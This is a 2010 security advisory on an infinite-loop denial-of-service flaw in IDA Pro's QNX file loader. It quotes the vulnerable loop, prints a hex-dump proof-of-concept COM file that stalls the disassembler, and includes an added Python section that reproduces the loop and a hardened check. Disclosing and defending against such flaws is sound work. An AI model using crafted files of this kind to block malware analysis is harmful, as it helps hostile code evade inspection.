Denial-of-Service Vulnerability in IDA Pro
------------------------------------------

June 28th, 2010

=======
Summary
=======
Name: Denial-of-Service Vulnerability in IDA Pro
Release Date: June 28th, 2010
Discoverer: Jason Geffner
Version Affected: IDA Pro 3.76 through 5.6
Risk: Low
Status: Published

============
Introduction
============
This paper discusses how a binary file could be crafted to cause IDA Pro to
consume 100% of CPU resources while trying to analyze it, thus preventing
disassembly. While this vulnerability is in the QNX file loader, a functional
COM file could be crafted to masquerade as a QNX file and trigger this issue.
This vulnerability was responsibly disclosed to IDA Pro's support personnel and
this advisory was not released until a fixed build was publicly released.

==========
Background
==========
"The IDA Pro Disassembler and Debugger is an interactive, programmable,
extendible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.
IDA Pro has become the de-facto standard for the analysis of hostile code,
vulnerability research and COTS validation." [1]

========
Timeline
========
07/28/98 IDA Pro loader for QNX files written
12/31/09 Denial-of-service vulnerability discovered in IDA Pro loader for QNX
         files
12/31/09 Detailed vulnerability report responsibly disclosed to IDA Pro's
         support personnel
01/04/10 Response received from IDA Pro's support personnel, confirming
         vulnerability
06/25/10 IDA Pro 5.7 released, fixing vulnerability
06/28/10 Advisory released

=============
Vulnerability
=============
IDA Pro uses different file loaders to disassemble files of different formats
(PE, ELF, etc.). The loader for QNX files contains a vulnerability that allows
a specially crafted file to cause the loader to go into an infinite loop,
thereby consuming 100% of CPU resources and preventing disassembly.

The for-loop below is designed to iterate through each lmf_data structure in
the input file, advancing the file pointer by sizeof(lmf_data) +
lmf_data.offset. However, if lmf_data.offset == -sizeof(lmf_data), then at is
never increased and this code will run in an infinite loop.

From \ldr\qnx\qnx.cpp(50):
  for(uint32 at = sizeof(ex.lmf_header)+ex.lmf_header.data_nbytes;
      lmf_data.segment_index != _LMF_EOF_REC;
      at += sizeof(lmf_data) + lmf_data.offset)
  {
    qlseek( li, at, 0 );
    if ( sizeof(_lmf_data) !=
            qlread( li, &lmf_data, sizeof(_lmf_data) ) ) return 0;
    switch(lmf_data.segment_index)
    {
...
      case _LMF_COMMENT_REC:
        break;
...
    }
  }

=======
Exploit
=======
While this vulnerability is in the QNX file loader, a functional COM file could
be crafted to masquerade as a QNX file and trigger this issue. As such, it
would be possible for a malware author to create a working malicious COM
program, craft it to appear as a QNX file to IDA Pro, and thus prevent IDA Pro
from being able to disassemble it. Windows 7 will correctly run such a COM
program even if it is named with a .EXE extension.

See below for a proof-of-concept COM file. When run from a command-prompt, this
program will print, "I can't be opened in IDA Pro :)". When opened in IDA Pro,
it will cause IDA Pro to spin in an infinite loop.

00000000:  00 00 34 00 00 00 b4 09 eb 02 82 01 ba 13 01 cd    ..4.............
00000010:  21 cd 20 49 20 63 61 6e 27 74 20 62 65 20 6f 70    !. I can't be op
00000020:  65 6e 65 64 20 69 6e 20 49 44 41 20 50 72 6f 20    ened in IDA Pro 
00000030:  3a 29 24 00 00 00 00 00 00 00 01 00 fa ff ff ff    :)$.............
00000040:  00 00 00 00 00 00                                  ......

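The quoted loop and the proof-of-concept bytes, worked through as an added Python example that is not part of this advisory or of IDA Pro's loader: it parses the hex dump above back into bytes, re-walks the record chain the way the qnx.cpp loop does (with an iteration cap so it returns), and beside it runs a hardened walk that rejects any record whose next offset does not move strictly forward inside the file, which is the check a loader or a pre-screening tool would want. The lmf_record/lmf_data layouts and the numeric values of _LMF_COMMENT_REC (1) and _LMF_EOF_REC (5) are assumptions taken from the QNX Load Module Format, not values stated in the advisory; the well-formed comparison file is constructed for the example.

```python
import struct

# Hex dump of the advisory's proof-of-concept file, transcribed from the page.
POC_HEXDUMP = """\
00000000:  00 00 34 00 00 00 b4 09 eb 02 82 01 ba 13 01 cd    ..4.............
00000010:  21 cd 20 49 20 63 61 6e 27 74 20 62 65 20 6f 70    !. I can't be op
00000020:  65 6e 65 64 20 69 6e 20 49 44 41 20 50 72 6f 20    ened in IDA Pro
00000030:  3a 29 24 00 00 00 00 00 00 00 01 00 fa ff ff ff    :)$.............
00000040:  00 00 00 00 00 00                                  ......
"""

# Record layouts as the quoted loader reads them (assumed from the QNX LMF format,
# not given in the advisory): a 6-byte lmf_record header (rec_type, reserved,
# data_nbytes, spare) opens the file, and a 6-byte lmf_data (segment_index, offset)
# is overlaid on each following record. offset is read as signed so that the
# -sizeof(lmf_data) case from the advisory shows up as -6.
LMF_RECORD = struct.Struct("<BBHH")
LMF_DATA = struct.Struct("<Hi")
_LMF_COMMENT_REC = 1   # assumed value
_LMF_EOF_REC = 5       # assumed value


def parse_hexdump(dump: str) -> bytes:
    """Turn an 'offset:  xx xx ... xx    ascii' dump back into raw bytes."""
    out = bytearray()
    for line in dump.splitlines():
        if not line.strip():
            continue
        _offset, rest = line.split(":", 1)
        hex_part = rest.split("    ", 1)[0]   # four spaces separate hex from the ASCII column
        out += bytes.fromhex(hex_part)
    return bytes(out)


def first_data_record(data: bytes) -> int:
    """Where the loop starts: sizeof(ex.lmf_header) + ex.lmf_header.data_nbytes."""
    _rec_type, _reserved, data_nbytes, _spare = LMF_RECORD.unpack_from(data, 0)
    return LMF_RECORD.size + data_nbytes


def walk_records_vulnerable(data: bytes, max_iters: int = 1000):
    """Mirror of the qnx.cpp loop, capped so it can return.
    Returns (visited records, status) with status 'done', 'eof' or 'stuck'."""
    at = first_data_record(data)
    visited = []
    for _ in range(max_iters):
        if at + LMF_DATA.size > len(data):
            return visited, "eof"            # qlread() short read: loader returns 0
        segment_index, offset = LMF_DATA.unpack_from(data, at)
        visited.append((at, segment_index, offset))
        if segment_index == _LMF_EOF_REC:
            return visited, "done"
        # uint32 arithmetic: offset == -6 cancels sizeof(lmf_data) and 'at' never moves
        at = (at + LMF_DATA.size + offset) & 0xFFFFFFFF
    return visited, "stuck"


def walk_records_hardened(data: bytes):
    """Same walk, but every step must land strictly after the current record and
    inside the file; anything else is rejected instead of looped on."""
    at = first_data_record(data)
    visited = []
    while True:
        if at + LMF_DATA.size > len(data):
            raise ValueError("truncated lmf_data record at 0x%x" % at)
        segment_index, offset = LMF_DATA.unpack_from(data, at)
        visited.append((at, segment_index, offset))
        if segment_index == _LMF_EOF_REC:
            return visited
        nxt = at + LMF_DATA.size + offset    # Python ints: no wrap-around to hide behind
        if nxt <= at or nxt > len(data):
            raise ValueError("record at 0x%x does not advance (next=0x%x)" % (at, nxt))
        at = nxt


def qnx_records_terminate(data: bytes) -> bool:
    """Pre-screening check: True only if the record chain is well-formed and reaches EOF."""
    try:
        walk_records_hardened(data)
    except ValueError:
        return False
    return True


# Constructed well-formed chain: a 4-byte definition payload, one comment record
# carrying 2 bytes of data, then the EOF record.
GOOD_SAMPLE = (
    LMF_RECORD.pack(0, 0, 4, 0) + b"\0\0\0\0"
    + LMF_DATA.pack(_LMF_COMMENT_REC, 2) + b"hi"
    + LMF_DATA.pack(_LMF_EOF_REC, 0)
)

if __name__ == "__main__":
    poc = parse_hexdump(POC_HEXDUMP)
    at = first_data_record(poc)
    print("first lmf_data at 0x%x: %r" % (at, poc[at:at + LMF_DATA.size]))
    visited, status = walk_records_vulnerable(poc, max_iters=50)
    print("vulnerable walk: %s after %d iterations, still at 0x%x"
          % (status, len(visited), visited[-1][0]))
    print("hardened check, PoC:", qnx_records_terminate(poc))
    print("hardened check, well-formed sample:", qnx_records_terminate(GOOD_SAMPLE))
```

On the PoC the first lmf_data sits at offset 0x3a and reads segment_index 1 (the comment case the loop ignores) with offset 0xfffffffa, i.e. -6, so the capped walk reports "stuck" at the same offset on every iteration while the hardened walk rejects the file on its first step. The "next offset must be greater than the current one and inside the file" rule is the general fix: it also catches negative offsets that jump backwards into an earlier record, not only the exact -sizeof(lmf_data) value.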
==========
Conclusion
==========
In-depth code reviews and fuzzing should be performed on all software,
especially when the software is designed for analyzing malicious and/or
untrusted data.

===============
Fix Information
===============
This issue has now been resolved. IDA Pro 5.7 can be downloaded from
https://www.hex-rays.com/updida.shtml

==========
References
==========
[1] http://hex-rays.com/idapro/overview.htm

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070